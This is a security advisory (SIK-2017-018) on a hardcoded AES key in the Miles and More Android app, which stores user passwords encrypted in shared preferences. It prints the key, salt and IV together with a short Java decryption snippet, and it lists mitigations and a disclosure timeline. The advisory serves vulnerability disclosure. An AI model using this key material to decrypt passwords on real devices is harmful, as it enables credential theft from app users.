SIK-2017-018

Title:

Hardcoded encryption key in Miles and More app

Report ID

SIK-2017-018

Summary:

Vendor: Miles and More GmbH
Product: Miles and More App
Affected Version: 1704301952
Severity: low-medium
Short summary: The password is stored AES encrypted in the shared prefs folder. The key for the encryption is hardcoded in the sourcecode and can so also be easily decrypted.

Details:

We assume that an attacker has access to the shared prefs.
After login the user credentials (including the password) are stored in the shared prefs. The password is stored encrypted with AES with a key hardcoded in the source code. The hardcoded key is the same for every installation. This is critical because every password can be decrypted with the same key.

Example

With the following code the password can be decrypted:
dependant repository


String password = getUserInput();
String key = "dsafkfjadflakjnfldsakjn";
String salt = "sdgjfslgjknsfkgjmnmnm";
byte[] iv = { -89, -19, 17, -83, 86, 106, -31, 30, -5, -111, 61, -75, -84, 95, 120, -53 };
Encryption encryption = Encryption.getDefault(key, salt, iv);
String encryptedPassword = "";
String decryptedPassword = "";
try {
  encryptedPassword = encryption.encrypt(password);
  Log.d("Encrypted Password: ", encryptedPassword);
  decryptedPassword = encryption.decrypt(encryptedPassword);
  Log.d("Decrypted Password: ", decryptedPassword);
}
catch (Exception e) {
}

Workaround

Clear data of the app after use
Do not root the device

Suggested Mitigation

Use individual keys per installation
Offer options for not storing credentials on the device

Timeline

2017-05-01 Vulnerability Discovered
2017-05-18 Vulnerability Reported
2017-07-26 Vulnerability Fixed